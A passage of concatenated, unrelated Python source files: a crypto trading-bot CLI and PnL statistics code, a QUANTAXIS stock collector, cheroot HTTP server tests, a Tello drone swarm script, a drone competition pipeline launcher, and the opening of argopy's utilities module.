for pair, strats_dict in self.strat_by_pair.items():
strat_ref = self.pnl[strats_dict['ref']]
df = strat_ref['pnl']
txt_table += self.set_stats_result(
df, period, strat_ref['period'], col={'price': '- ' + pair}
)
for key in strats_dict['strat']:
value = self.pnl[key]
df = value['pnl']
txt_table += self.set_stats_result(
df,
period,
value['period'],
col={'value': key}
)
txt_table += self.set_stats_result(
self.tot_val, period, 365, col={'value': 'total'}
)
txt_table += (['-'] * (1 + len(self.metrics) + 2),)
return txt_table
def set_stats_result(self, df, head, period, col):
_index = self._get_period_index(df, head)
if _index is None:
return ''
return self._set_stats_result(df.loc[_index], head, period, col=col)
def _set_stats_result(self, df, head, period, col=None):
""" Set statistics in a table with header. """
# table = [['-'] * (1 + len(self.metrics)), [head]]
table = []
if col is None:
col = {'price': 'underlying', 'value': 'strategy'}
for k, a in col.items():
table += [[str(a)] + self.set_statistics(df.loc[:, k].values,
period)]
# Append slippage and fees
if k == 'price':
table[-1] += [' ', ' ']
elif k == 'value':
slippage = np.sum(df.loc[:, 'slippage'].values)
cum_fees = np.sum(df.loc[:, 'fee'].values)
table[-1] += _rounder(slippage, cum_fees, dec=2)
return table
def set_statistics(self, series, period):
""" Compute statistics of a series of price or index values.
Parameters
----------
series : np.ndarray[ndim=1, dtype=np.float64]
Series of price or index values.
Returns
-------
list
Some statistics predefined when initialize the object.
"""
metric_values = []
for metric in self.metrics:
if series.size < 2:
metric_values += [0]
elif metric.lower() == 'return':
metric_values += [series[-1] - series[0]]
elif metric.lower() in ['perf', 'perf.', 'performance']:
metric_values += [series[-1] / series[0] - 1.]
elif metric.lower() == 'sharpe':
metric_values += [fy.sharpe(series, period=period)]
elif metric.lower() == 'calmar':
metric_values += [fy.calmar(series, period=period)]
elif metric.lower() == 'maxdd':
metric_values += [fy.mdd(series)]
else:
self.logger.error('Unknown metric: {}'.format(metric))
return _rounder(*metric_values, dec=2)
def _get_period_index(self, df, period):
if period.lower() == 'daily':
_index = df.index >= df.index[-1] - 86400
elif period.lower() == 'weekly':
_index = df.index >= df.index[-1] - 86400 * 7
elif period.lower() == 'monthly':
_index = df.index >= df.index[-1] - 86400 * 30
elif period.lower() == 'yearly':
_index = df.index >= df.index[-1] - 86400 * 365
elif period.lower() == 'total':
_index = df.index >= df.index[0]
else:
self.logger.error('Unknown period: {}'.format(period))
_index = None
# NOT CLEAN SOLUTION
# if _index.sum() < 2:
# _index = df.index >= df.index[-2]
return _index
def _set_ref_pair(self, _id, pair, freq, TS_0):
if self.min_freq is None or freq < self.min_freq:
self.min_freq = freq
if self.min_TS is None or TS_0 < self.min_TS:
self.min_TS = TS_0
if pair not in self.strat_by_pair:
self.strat_by_pair[pair] = {'strat': []}
f = self.strat_by_pair[pair].get('freq')
t = self.strat_by_pair[pair].get('TS_0')
if f is None or freq < f or (freq == f and TS_0 < t):
self.strat_by_pair[pair]['freq'] = freq
self.strat_by_pair[pair]['TS_0'] = TS_0
self.strat_by_pair[pair]['ref'] = _id
self.strat_by_pair[pair]['strat'] += [_id]
def _update_pnl(self):
pairs = ','.join(list(self.strat_by_pair.keys()))
self.close = get_close(pairs)
if not isinstance(self.close, dict):
self.close = {pairs: self.close}
total_ret = 0.
t = int(time.time() / self.min_freq + 1) * self.min_freq
for pair, strats_dict in self.strat_by_pair.items():
close = self.close[pair]
for strat in strats_dict['strat']:
df = self.pnl[strat]['pnl']
T = df.index[-1]
if T == t:
df = df.drop(T, axis=0)
df = update_pnl(df, close, t)
self.pnl[strat]['pnl'] = df
total_ret += df.loc[t, 'PnL']
val = self.tot_val.value.iloc[-1]
self.tot_val.loc[t, 'value'] = val + total_ret
self.tot_val.loc[t, ('slippage', 'fee')] = 0, 0
def update_pnl(df, close, t):
""" Update PnL dataframe with closed price. """
T = df.index[-1]
ret = close - df.loc[T, 'price']
vol = df.loc[T, 'volume']
pos = df.loc[T, 'signal']
df.loc[t, 'price'] = close
df.loc[t, 'returns'] = ret
df.loc[t, 'volume'] = vol
df.loc[t, 'position'] = pos
df.loc[t, 'exchanged_volume'] = 0
df.loc[t, 'signal'] = pos
df.loc[t, 'delta_signal'] = 0
df.loc[t, 'fee'] = 0
df.loc[t, 'PnL'] = ret * vol * pos
df.loc[t, 'cumPnL'] = df.loc[T, 'cumPnL'] + df.loc[t, 'PnL']
df.loc[t, 'value'] = df.loc[T, 'value'] + df.loc[t, 'PnL']
df.loc[t, 'slippage'] = 0
return df
class CLI(_ClientCLI):
""" Object to allow a Command Line Interface. """
# TODO : append 'perf' command on specified strategy
# append 'balance' command on specified pair currency
txt = ('The following commands are supported, press <ENTER> at the end.\n'
' - <q> quit the command line interface.\n'
' - <start [strategy_name]> run the specified strategy bot.\n'
' - <stop [strategy_name]> interupt the specified strategy bot.\n'
' - <stop> interupt the TradingBotManager.\n'
' - <ENTER> update the KPI of current running strategy bot.\n'
"If no commands are received after 30 seconds, the CLI exited.")
TIMEOUT = 30
strat_bot = {}
pair = {}
txt_running_clients = ''
running_strats = {}
def __init__(self, path, address=('', 50000), authkey=b'tradingbot'):
""" Initialize a CLI object. """
# TODO : if trading bot not yet running => launch it
super(CLI, self).__init__(address=address, authkey=authkey)
self.logger = logging.getLogger('cli')
self.path = path
self.term = Terminal()
def __enter__(self):
""" Enter. """
self.logger.debug('enter')
# TODO : Load config ?
super(CLI, self).__enter__()
self.conn_tbm.thread = Thread(target=self.listen_tbm, daemon=True)
self.conn_tbm.thread.start()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
""" Exit. """
# TODO : Save configuration ?
if exc_type is not None:
self.logger.error(
'{}: {}'.format(exc_type, exc_value),
exc_info=True
)
super(CLI, self).__exit__(exc_type, exc_value, exc_tb)
self.conn_tbm.thread.join()
self.logger.debug('exit')
def __iter__(self):
return self
def __next__(self):
if self.is_stop():
raise StopIteration
time.sleep(0.15)
print(self.txt)
i, o, e = select.select([sys.stdin], [], [], self.TIMEOUT)
if i:
k = sys.stdin.readline().strip('\n').lower().split(' ')
self.logger.debug('command: {}'.format(k))
self._request_running_clients()
time.sleep(0.1)
else:
self.logger.debug('Time out, CLI exit')
k = ['q']
if k[0] == 'q':
raise StopIteration
elif k[0] == 'stop':
if len(k) < 2 or k[1] in ['all', 'trading_bot']:
return ['_stop', 'tradingbot']
elif k[1] in self.running_strats:
return ['_stop', k[1]]
elif k[0] == 'start':
if len(k) < 2:
self.logger.error("With 'start' command you must specify a "
"name of strategy_bot")
else:
return k[:2]
elif k[0] == 'perf':
if len(k) < 2:
k += ['all']
return k
elif k[1] in self.running_strats:
return k[:2]
elif not k[0]:
return 'sb_update'
self.logger.error("Unknown commands {}".format(k))
def display(self):
print(self.term.home + self.term.clear)
self.logger.debug('display')
strat_val = [['-'] * 3, ['Strategies', 'Values', 'Volumes'], ['-'] * 3]
for s, args in self.strat_values.items():
strat_val += [[s, '{:.2f}'.format(args['value']),
'{:.8f}'.format(args['volume'])]]
strat_val += [['-'] * 3]
if self.strat_values:
txt_strat = _set_text(*strat_val)
txt_clients = self.txt_running_clients
strat = {
k: v for k, v in self.strat_bot.items() if v.get('pnl') is not None
}
if strat:
rm = _ResultManager(strat)
txt_stats = _set_text(*rm.get_current_stats())
close = rm.close
txt_close = [['-'] * 2, ['Pair', 'Close'], ['-'] * 2]
for pair, price, in close.items():
txt_close += [[pair, price], ['-'] * 2]
txt_close = txt_close[:-1] + [['-'] * 2]
txt_close = _set_text(*txt_close)
txt_balance = _set_text(*self._set_text_balance())
txt_pos = _set_text(*self._set_text_position())
txt = _zip_text(
txt_stats,
txt_close + '\n\n' + txt_strat + '\n\n' + txt_clients + '\n\n' + txt_balance
)
print(txt)
print(txt_pos)
else:
print(txt_clients + 'No strategy bot is running.')
def listen_tbm(self):
self.logger.debug('start listen TradingBotManager')
for k, a in self.conn_tbm:
if self.is_stop():
self.conn_tbm.shutdown()
elif k is None:
continue
self._handler_tbm(k, a)
self.update()
if k == 'sb_update':
# TODO : display performances
self.display()
self.logger.debug('stop listen TradingBotManager')
def run(self):
# TODO : request running clients
self._request_running_clients()
for k in self:
if k is None:
continue
elif k == 'sb_update':
self.conn_tbm.send((k, None),)
elif k[0] in ['perf', 'start', '_stop']:
self.conn_tbm.send((k[0], k[1:]),)
else:
self.logger.error('Unknown command: {}'.format(k))
time.sleep(0.1)
def update(self):
self.logger.debug('update start')
self.strat_values = {}
for k in self.strat_bot:
txt = 'update {}'.format(k)
pnl = get_df(self.path + k, 'PnL', ext='.dat')
if pnl.empty:
continue
value = pnl.value.iloc[-1]
self.strat_values[k] = {'value': value,
'volume': value / pnl.price.iloc[-1]}
self.logger.debug(txt)
self.strat_bot[k]['pnl'] = pnl
def _handler_tbm(self, k, a):
# information received from TradingBotManager
if k is None:
pass
elif k == 'sb_update':
self.pair = {}
self.strat_bot = {n: self._get_sb_dict(i, n) for i, n in a.items()}
elif k == 'running_clients':
self.running_strats = a['strategy_bots']
self.txt_running_clients = ''
for c, v in a.items():
if c == 'strategy_bots':
if not v:
continue
self.txt_running_clients += c + ':\n'
for sc, sv in v.items():
self.txt_running_clients += '{} is {}\n'.format(sc, sv)
else:
self.txt_running_clients += '{} is {}\n'.format(c, v)
elif k == 'balance':
self.logger.info('Receive balance: {}'.format(a))
self.balance = a
elif k in ['cpos', 'cvol']:
for key, args in self.strat_bot.items():
if args['id'] == a[0]:
self.strat_bot[key][k] = a[1]
else:
self.logger.error('received unknown message {}: {}'.format(k, a))
def _get_sb_dict(self, _id, name):
# load some configuration info
sb_dict = {'id': _id}
cfg = load_config_params(self.path + name + '/configuration.yaml')
sb_dict['pair'] = pair = cfg['order_instance']['pair']
sb_dict['vali'] = cfg['order_instance'].get('validate', False)
sb_dict['freq'] = cfg['strat_manager_instance']['frequency']
sb_dict['kwrd'] = cfg['result_instance']
self.conn_tbm.send(('get_pos', _id),)
self.conn_tbm.send(('get_vol', _id),)
sb_dict['cpos'] = cfg['strat_manager_instance']['current_pos']
sb_dict['cvol'] = cfg['strat_manager_instance']['current_vol']
if pair not in self.pair:
self.pair[pair] = []
self.pair[pair] += [pair]
return sb_dict
def _request_running_clients(self):
self.conn_tbm.send(('get_running_clients', None),)
time.sleep(0.1)
def _set_text_balance(self):
ccy = []
for pair in self.pair:
c1, c2 = pair[:4], pair[4:]
ccy = ccy + [c1] if c1 not in ccy and c1 in self.balance else ccy
ccy = ccy + [c2] if c2 not in ccy and c2 in self.balance else ccy
txt_list = [('-', '-'), ('Currency', 'Balance'), ('-', '-')]
for c in ccy:
txt_list += [[c] + _rounder(self.balance[c], dec=8)]
return txt_list + [('-', '-')]
def _set_text_position(self):
txt_list = [['-'] * 6,
['Strategy', 'Real Position', 'Theorical Position', 'Rvol', 'Rvol2', 'Thvol'],
['-'] * 6]
for name, kwargs in self.strat_bot.items():
pnl = kwargs['pnl']
re_pos = pnl.position.iloc[0] + pnl.delta_signal.sum()
th_pos = kwargs['cpos']
re_vol = pnl.volume.iloc[0] + (pnl.PnL / pnl.price).sum()
re_vol_2 = pnl.volume.iloc[0] + (pnl.exchanged_volume * np.sign(pnl.delta_signal)).sum()
th_vol = kwargs['cvol']
txt_list += [[name, re_pos, th_pos, re_vol, re_vol_2, th_vol]]
return txt_list + [['-'] * 6]
if __name__ == "__main__":
import logging.config
# Load logging configuration
log_config = load_config_params('./trading_bot/logging.ini')
logging.config.dictConfig(log_config)
# Load general configuration
gen_config = load_config_params('./general_config.yaml')
path = gen_config['path']['strategy']
try:
cli = CLI(path)
except ConnectionRefusedError:
txt = 'TradingBotManager is not running, do you want to run it? Y/N'
while True:
a = input(txt)
if a[0].lower() == 'y':
# TODO : run TradingBotServer
print('not yet implemented')
break
elif a[0].lower() == 'n':
exit()
else:
print('Unknown command: {}. Answere with yes or no.'.format(a))
with cli:
cli.run()
|
stockcollector.py
|
import json
import threading
import datetime
from QAPUBSUB.consumer import subscriber_routing
from QAPUBSUB.producer import publisher, publisher_routing
from QARealtimeCollector.setting import eventmq_ip
from QUANTAXIS.QAARP.QAUser import QA_User
from QUANTAXIS.QAEngine.QAThreadEngine import QA_Thread
from QUANTAXIS.QAFetch.QATdx_adv import QA_Tdx_Executor
from QUANTAXIS.QAUtil.QATransform import QA_util_to_json_from_pandas
class QARTC_Stock(QA_Tdx_Executor):
def __init__(self):
super().__init__(name='QAREALTIME_COLLECTOR_STOCK')
self.codelist = []
self.sub = subscriber_routing(host=eventmq_ip,
exchange='QARealtime_Market', routing_key='stock')
self.sub.callback = self.callback
self.pub = publisher(
host=eventmq_ip, exchange='stocktransaction')
threading.Thread(target=self.sub.start, daemon=True).start()
def subscribe(self, code):
"""继续订阅
Arguments:
code {[type]} -- [description]
"""
if code not in self.codelist:
self.codelist.append(code)
def unsubscribe(self, code):
self.codelist.remove(code)
def callback(self, a, b, c, data):
data = json.loads(data)
if data['topic'] == 'subscribe':
print('receive new subscribe: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
import copy
if isinstance(new_ins, list):
for item in new_ins:
self.subscribe(item)
else:
self.subscribe(new_ins)
if data['topic'] == 'unsubscribe':
print('receive new unsubscribe: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
import copy
if isinstance(new_ins, list):
for item in new_ins:
self.unsubscribe(item)
else:
self.unsubscribe(new_ins)
def get_data(self):
data, time = self.get_realtime_concurrent(self.codelist)
data = QA_util_to_json_from_pandas(data.reset_index())
self.pub.pub(json.dumps(data))
def run(self):
while 1:
self.get_data()
import time
print(datetime.datetime.now())
time.sleep(1)
if __name__ == "__main__":
r = QARTC_Stock()
r.subscribe('000001')
r.subscribe('000002')
r.start()
r.subscribe('600010')
import json
import time
time.sleep(2)
publisher_routing(exchange='QARealtime_Market', routing_key='stock').pub(json.dumps({
'topic': 'subscribe',
'code': '600012'
}), routing_key='stock')
r.unsubscribe('000001')
|
test_server.py
|
"""Tests for the HTTP server."""
# -*- coding: utf-8 -*-
# vim: set fileencoding=utf-8 :
import os
import socket
import tempfile
import threading
import time
import pytest
from .._compat import bton
from ..server import Gateway, HTTPServer
from ..testing import (
ANY_INTERFACE_IPV4,
ANY_INTERFACE_IPV6,
EPHEMERAL_PORT,
get_server_client,
)
def make_http_server(bind_addr):
"""Create and start an HTTP server bound to bind_addr."""
httpserver = HTTPServer(
bind_addr=bind_addr,
gateway=Gateway,
)
threading.Thread(target=httpserver.safe_start).start()
while not httpserver.ready:
time.sleep(0.1)
return httpserver
non_windows_sock_test = pytest.mark.skipif(
not hasattr(socket, 'AF_UNIX'),
reason='UNIX domain sockets are only available under UNIX-based OS',
)
@pytest.fixture
def http_server():
"""Provision a server creator as a fixture."""
def start_srv():
bind_addr = yield
httpserver = make_http_server(bind_addr)
yield httpserver
yield httpserver
srv_creator = iter(start_srv())
next(srv_creator)
yield srv_creator
try:
while True:
httpserver = next(srv_creator)
if httpserver is not None:
httpserver.stop()
except StopIteration:
pass
@pytest.fixture
def unix_sock_file():
"""Check that bound UNIX socket address is stored in server."""
tmp_sock_fh, tmp_sock_fname = tempfile.mkstemp()
yield tmp_sock_fname
os.close(tmp_sock_fh)
os.unlink(tmp_sock_fname)
@pytest.mark.parametrize(
'ip_addr',
(
ANY_INTERFACE_IPV4,
ANY_INTERFACE_IPV6,
)
)
def test_bind_addr_inet(http_server, ip_addr):
"""Check that bound IP address is stored in server."""
httpserver = http_server.send((ip_addr, EPHEMERAL_PORT))
assert httpserver.bind_addr[0] == ip_addr
assert httpserver.bind_addr[1] != EPHEMERAL_PORT
@non_windows_sock_test
def test_bind_addr_unix(http_server, unix_sock_file):
"""Check that bound UNIX socket address is stored in server."""
httpserver = http_server.send(unix_sock_file)
assert httpserver.bind_addr == unix_sock_file
@pytest.mark.skip(reason="Abstract sockets don't work currently")
@non_windows_sock_test
def test_bind_addr_unix_abstract(http_server):
"""Check that bound UNIX socket address is stored in server."""
unix_abstract_sock = b'\x00cheroot/test/socket/here.sock'
httpserver = http_server.send(unix_abstract_sock)
assert httpserver.bind_addr == unix_abstract_sock
PEERCRED_IDS_URI = '/peer_creds/ids'
PEERCRED_TEXTS_URI = '/peer_creds/texts'
class _TestGateway(Gateway):
def respond(self):
req = self.req
conn = req.conn
req_uri = bton(req.uri)
if req_uri == PEERCRED_IDS_URI:
peer_creds = conn.peer_pid, conn.peer_uid, conn.peer_gid
return ['|'.join(map(str, peer_creds))]
elif req_uri == PEERCRED_TEXTS_URI:
return ['!'.join((conn.peer_user, conn.peer_group))]
return super(_TestGateway, self).respond()
@pytest.mark.skip(
reason='Test HTTP client is not able to work through UNIX socket currently'
)
@non_windows_sock_test
def test_peercreds_unix_sock(http_server, unix_sock_file):
"""Check that peercred lookup and resolution work when enabled."""
httpserver = http_server.send(unix_sock_file)
httpserver.gateway = _TestGateway
httpserver.peercreds_enabled = True
testclient = get_server_client(httpserver)
expected_peercreds = os.getpid(), os.getuid(), os.getgid()
expected_peercreds = '|'.join(map(str, expected_peercreds))
assert testclient.get(PEERCRED_IDS_URI) == expected_peercreds
assert 'RuntimeError' in testclient.get(PEERCRED_TEXTS_URI)
httpserver.peercreds_resolve_enabled = True
import grp
expected_textcreds = os.getlogin(), grp.getgrgid(os.getgid()).gr_name
expected_textcreds = '!'.join(map(str, expected_textcreds))
assert testclient.get(PEERCRED_TEXTS_URI) == expected_textcreds
|
multi_tello_test.py
|
# -*- coding: utf-8 -*-
import sys
import time
from tello_manager import *
import Queue
import time
import os
import binascii
reload(sys)
sys.setdefaultencoding('utf-8')
def create_execution_pools(num):
pools = []
for x in range(num):
execution_pool = Queue.Queue()
pools.append(execution_pool)
return pools
def drone_handler(tello, queue):
while True:
while queue.empty():
pass
command = queue.get()
tello.send_command(command)
def all_queue_empty(execution_pools):
for queue in execution_pools:
if not queue.empty():
return False
return True
def all_got_response(manager):
for tello_log in manager.get_log().values():
if not tello_log[-1].got_response():
return False
return True
def save_log(manager):
log = manager.get_log()
if not os.path.exists('log'):
try:
os.makedirs('log')
except Exception, e:
pass
out = open('log/' + start_time + '.txt', 'w')
cnt = 1
for stat_list in log.values():
out.write('------\nDrone: %s\n' % cnt)
cnt += 1
for stat in stat_list:
#stat.print_stats()
str = stat.return_stats()
out.write(str)
out.write('\n')
def check_timeout(start_time, end_time, timeout):
diff = end_time - start_time
time.sleep(0.1)
return diff > timeout
manager = Tello_Manager()
start_time = str(time.strftime("%a-%d-%b-%Y_%H-%M-%S-%Z", time.localtime(time.time())))
try:
file_name = sys.argv[1]
f = open(file_name, "r")
commands = f.readlines()
tello_list = []
execution_pools = []
sn_ip_dict = {}
id_sn_dict = {}
ip_fid_dict = {}
for command in commands:
if command != '' and command != '\n':
command = command.rstrip()
if '//' in command:
# ignore comments
continue
elif 'scan' in command:
num_of_tello = int(command.partition('scan')[2])
manager.find_avaliable_tello(num_of_tello)
tello_list = manager.get_tello_list()
execution_pools = create_execution_pools(num_of_tello)
for x in range(len(tello_list)):
t1 = Thread(target=drone_handler, args=(tello_list[x], execution_pools[x]))
ip_fid_dict[tello_list[x].tello_ip] = x
#str_cmd_index_dict_init_flag [x] = None
t1.daemon = True
t1.start()
elif '>' in command:
id_list = []
id = command.partition('>')[0]
if id == '*':
for x in range(len(tello_list)):
id_list.append(x)
else:
# index starbattery_checkt from 1
id_list.append(int(id)-1)
action = str(command.partition('>')[2])
# push command to pools
for tello_id in id_list:
tmp_sn = id_sn_dict[tello_id]
reflec_ip = sn_ip_dict[tmp_sn]
fid = ip_fid_dict[reflec_ip]
execution_pools[fid].put(action)
elif 'battery_check' in command:
threshold = int(command.partition('battery_check')[2])
for queue in execution_pools:
queue.put('battery?')
# wait till all commands are executed
while not all_queue_empty(execution_pools):
time.sleep(0.5)
# wait for new log object append
time.sleep(1)
# wait till all responses are received
while not all_got_response(manager):
time.sleep(0.5)
for tello_log in manager.get_log().values():
battery = int(tello_log[-1].response)
print ('[Battery_Show]show drone battery: %d ip:%s\n' % (battery,tello_log[-1].drone_ip))
if battery < threshold:
print('[Battery_Low]IP:%s Battery < Threshold. Exiting...\n'%tello_log[-1].drone_ip)
save_log(manager)
exit(0)
print ('[Battery_Enough]Pass battery check\n')
elif 'delay' in command:
delay_time = float(command.partition('delay')[2])
print ('[Delay_Seconds]Start Delay for %f second\n' %delay_time)
time.sleep(delay_time)
elif 'correct_ip' in command:
for queue in execution_pools:
queue.put('sn?')
while not all_queue_empty(execution_pools):
time.sleep(0.5)
time.sleep(1)
while not all_got_response(manager):
time.sleep(0.5)
for tello_log in manager.get_log().values():
sn = str(tello_log[-1].response)
tello_ip = str(tello_log[-1].drone_ip)
sn_ip_dict[sn] = tello_ip
elif '=' in command:
drone_id = int(command.partition('=')[0])
drone_sn = command.partition('=')[2]
id_sn_dict[drone_id-1] = drone_sn
print ('[IP_SN_FID]:Tello_IP:%s------Tello_SN:%s------Tello_fid:%d\n'%(sn_ip_dict[drone_sn],drone_sn,drone_id))
#print id_sn_dict[drone_id]
elif 'sync' in command:
timeout = float(command.partition('sync')[2])
print '[Sync_And_Waiting]Sync for %s seconds \n' % timeout
time.sleep(1)
try:
start = time.time()
# wait till all commands are executed
while not all_queue_empty(execution_pools):
now = time.time()
if check_timeout(start, now, timeout):
raise RuntimeError
print '[All_Commands_Send]All queue empty and all command send,continue\n'
# wait till all responses are received
while not all_got_response(manager):
now = time.time()
if check_timeout(start, now, timeout):
raise RuntimeError
print '[All_Responses_Get]All response got, continue\n'
except RuntimeError:
print '[Quit_Sync]Fail Sync:Timeout exceeded, continue...\n'
# wait till all commands are executed
while not all_queue_empty(execution_pools):
time.sleep(0.5)
time.sleep(1)
# wait till all responses are received
while not all_got_response(manager):
time.sleep(0.5)
save_log(manager)
except KeyboardInterrupt:
print '[Quit_ALL]Multi_Tello_Task got exception. Sending land to all drones...\n'
for ip in manager.tello_ip_list:
manager.socket.sendto('land'.encode('utf-8'), (ip, 8889))
save_log(manager)
|
main.py
|
import argparse
from datetime import datetime
import logging
from modules.targetAcquisition.taxi.TaxiWorker import taxi_worker
import os
import multiprocessing as mp
import json
from modules.targetAcquisition.targetAcquisitionWorker import targetAcquisitionWorker
from modules.decklinksrc.decklinkSrcWorker import decklinkSrcWorker
from modules.decklinksrc.decklinkSrcWorker_taxi import decklinkSrcWorker_taxi
from modules.QRScanner.QRWorker import qr_worker
from modules.search.searchWorker import searchWorker
from modules.commandModule.commandWorker_flight import flight_command_worker, pogi_subworker
from modules.commandModule.commandWorker_taxi_first import command_taxi_worker_continuous, taxi_command_worker_first
from modules.mergeImageWithTelemetry.mergeImageWithTelemetryWorker import pipelineMergeWorker
from modules.geolocation.geolocationWorker import geolocation_locator_worker, geolocation_output_worker
from modules.searchExplosive.searchExplosiveWorker import searchExplosiveWorker
from modules.videoDisplay.videoDisplayWorker import videoDisplayWorker
PIGO_DIRECTORY = ""
POGI_DIRECTORY = ""
# Main process called by command line
# Main process manages PROGRAMS, programs call submodules for data processing and move data around to achieve a goal.
logger = None
def callTrain():
main_directory = os.getcwd()
"""
stores current working directory prior to change
"""
logger.debug("main/callTrain: Started")
if os.path.exists("targetAcquisition/yolov2_assets"):
# Importing file runs the process inside
import modules.targetAcquisition.yolov2_assets.train
else:
logger.error("main/callTrain: YOLOV2_ASSETS Directory not found. Specify path")
logger.error("main/callTrain: Finished")
def flightProgram():
"""
Flight program implementation goes here. Outline:
Instantiate pipeline, video mediator, start frame capture, feed tent coordinates into pipeline.
Feed tent coordinates from pipeline into geolocation
Get GPS coordinates from geolocation
Send coordinates to command module
Parameters: None
"""
logger.debug("main/flightProgram: Start flight program")
# Queue from decklinksrc to targetAcquisition
videoPipeline = mp.Queue()
# Queue from command module out to fusion module containing timestamped telemetry data from POGI
telemetryPipeline = mp.Queue()
# Queue from fusion module out to targetAcquisition, containing grouped image and telemetry data from a "single time"
mergedDataPipeline = mp.Queue()
# Queue from targetAcquisition out to geolocation_locator_worker, containing centre-of-bbox coordinate data and associated telemetry data
bboxAndTelemetryPipeline = mp.Lock()
# Intermediary pipeline transferring a list of potential coordinates from geolocaion_locator_worker to geolocation_ouput_worker
geolocationIntermediatePipeline = mp.Queue()
# Queue from geolocation module out to command module, containing (x, y) coordinates of detected pylons
locationCommandPipeline = mp.Queue()
# Lock for bboxAndTelemetryPipeline
bboxAndTelemetryLock = mp.Lock()
# Lock for geolocationIntermediatePipeline
geolocationIntermediateLock = mp.Lock()
# Utility locks
pause = mp.Lock()
quit = mp.Queue()
processes = [
mp.Process(target=decklinkSrcWorker, args=(pause, quit, videoPipeline)),
mp.Process(target=pipelineMergeWorker,
args=(pause, quit, videoPipeline, telemetryPipeline, mergedDataPipeline)),
mp.Process(target=targetAcquisitionWorker, args=(pause, quit, mergedDataPipeline, bboxAndTelemetryPipeline)),
mp.Process(target=geolocation_locator_worker,
args=(pause, quit, bboxAndTelemetryPipeline, geolocationIntermediatePipeline, bboxAndTelemetryLock)),
mp.Process(target=geolocation_output_worker,
args=(pause, quit, geolocationIntermediatePipeline, locationCommandPipeline, geolocationIntermediateLock)),
mp.Process(target=flight_command_worker,
args=(pause, quit, locationCommandPipeline, telemetryPipeline, PIGO_DIRECTORY, POGI_DIRECTORY))
]
for p in processes:
p.start()
logger.debug("main/flightProgram: Flight program init complete")
def qrProgram():
"""
Search program implementation here.
Parameters: None
Returns: None
"""
videoPipeline = mp.Queue()
pause = mp.Lock()
quit = mp.Queue()
processes = [
mp.Process(target=decklinkSrcWorker_taxi, args=(pause, quit, videoPipeline)),
mp.Process(target=qr_worker, args=(pause, quit, videoPipeline))
]
for p in processes:
p.start()
def searchExplosiveProgram():
"""
Search Explosive program implementation
Parameters: None
Returns: None
"""
pipelineIn = mp.Queue()
pipelineOut = mp.Queue()
pause = mp.Lock()
quit = mp.Queue()
processes = [
mp.Process(target=searchExplosiveWorker, args=(pause, quit, pipelineIn, pipelineOut)),
]
for p in processes:
p.start()
def init_logger():
baseDir = os.path.dirname(os.path.realpath(__file__))
logFileName = os.path.join(baseDir, "logs", str(datetime.today().date()) + "_" +
str(datetime.today().hour) + "." +
str(datetime.today().minute) + "." +
str(datetime.today().second) + ".log")
# with open(logFileName, 'w') as write_file:
# write_file.write("LOG START")
formatter = logging.Formatter(fmt='%(asctime)s: [%(levelname)s] %(message)s', datefmt='%I:%M:%S')
fileHandler = logging.FileHandler(filename=logFileName, mode="w")
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
fileHandler.setFormatter(formatter)
logging.basicConfig(level=logging.DEBUG, handlers=[fileHandler, streamHandler])
logging.debug("main/init_logger: Logger Initialized")
return logging.getLogger()
def taxiProgram():
"""
Taxi program implementation here.
Parameters: None
Returns: None
"""
#function definition: Log 'msg % args' with severity 'ERROR'.
logger.error("main/taxiProgram: Taxi Program Started")
# Set up data structures for first POGI retrieval
pogiInitPipeline = mp.Queue()
firstTelemetry = None
while True:
# Read pogi data and put it into the pipeline if it is available
pogi_subworker(pogiInitPipeline, POGI_DIRECTORY)
# If we don't get any data, try again
if pogiInitPipeline.empty():
continue # skips the rest of the loop and loops again
# Once we have data, break out of the loop
firstTelemetry = pogiInitPipeline.get()
break
# Get cached Pylon GPS coordinates
pylonGpsData = None
with open("temp_pylon_gps") as file:
pylonGpsData = json.load(file)
# If any of the two pieces of data from above are None, throw an error and leave
if firstTelemetry is None:
logger.error("main/taxiProgram: Taxi program couldn't get telemetry data")
return
if pylonGpsData is None:
logger.error("main/taxiProgram: Taxi program couldn't get cached pylon gps data")
return
# Get result from search and run taxi command worker with the given heading command
searchResult = searchWorker(firstTelemetry.data, pylonGpsData)
taxi_command_worker_first(searchResult)
# Set up pipeline architecture for taxi
deckLinkSrcOutTaxiInPipeline = mp.Queue() # Timestamped data
taxiOutCommandInPipeline = mp.Queue()
pause = mp.Lock()
quit = mp.Queue()
processes = [
mp.Process(target=decklinkSrcWorker, args=(pause, quit, deckLinkSrcOutTaxiInPipeline)),
mp.Process(target=taxi_worker, args=(pause, quit, deckLinkSrcOutTaxiInPipeline, taxiOutCommandInPipeline)),
mp.Process(target=command_taxi_worker_continuous, args=(pause, quit, taxiOutCommandInPipeline))
]
for p in processes:
p.start()
logger.error("main/taxiProgram: Taxi Program Init Finished")
return
def showVideo(): # this function needs to call functions in videoDisplay and decklinkSrcWorker
"""
Display video implementation here.
Parameters: None
Returns: None
"""
#logger.debug("main/showVideo: Video Display Started") # start message, logs with severity DEBUG
videoPipeline = mp.Queue()
# Queue from command module out to fusion module containing timestamped telemetry data from POGI
# Utility locks
pause = mp.Lock()
quit = mp.Queue()
processes = [
mp.Process(target=decklinkSrcWorker_taxi, args=(pause, quit, videoPipeline)),
mp.Process(target=videoDisplayWorker, args=(pause, quit, videoPipeline))
]
for p in processes:
p.start()
#logger.debug("main/showVideo: Video Display Finished")
return
if __name__ == '__main__':
"""
Starts the appropriate program based on what was passed in as a command line argument.
Parameters: Args for commands
Returns: None
"""
logger = init_logger()
parser = argparse.ArgumentParser()
parser.add_argument("program", help="Program name to execute (flight, taxi, search)")
# Locals is a symbol table, it allows you to execute a function by doing a search of its name.
program = parser.parse_args().program
assert program + 'Program' in locals()
locals()[program + 'Program']()
|
utilities.py
|
#!/bin/env python
# -*coding: UTF-8 -*-
#
# Disclaimer:
# Functions get_sys_info, netcdf_and_hdf5_versions and show_versions are from:
# xarray/util/print_versions.py
#
import os
import sys
import warnings
import urllib
import json
import collections
import copy
from functools import reduce
from packaging import version
import importlib
import locale
import platform
import struct
import subprocess
import contextlib
import xarray as xr
import pandas as pd
import numpy as np
from scipy import interpolate
import pickle
import pkg_resources
import shutil
import threading
import time
from argopy.options import OPTIONS, set_options
from argopy.stores import httpstore
from argopy.errors import (
FtpPathError,
InvalidFetcher,
InvalidFetcherAccessPoint,
InvalidOption
)
try:
collectionsAbc = collections.abc
except AttributeError:
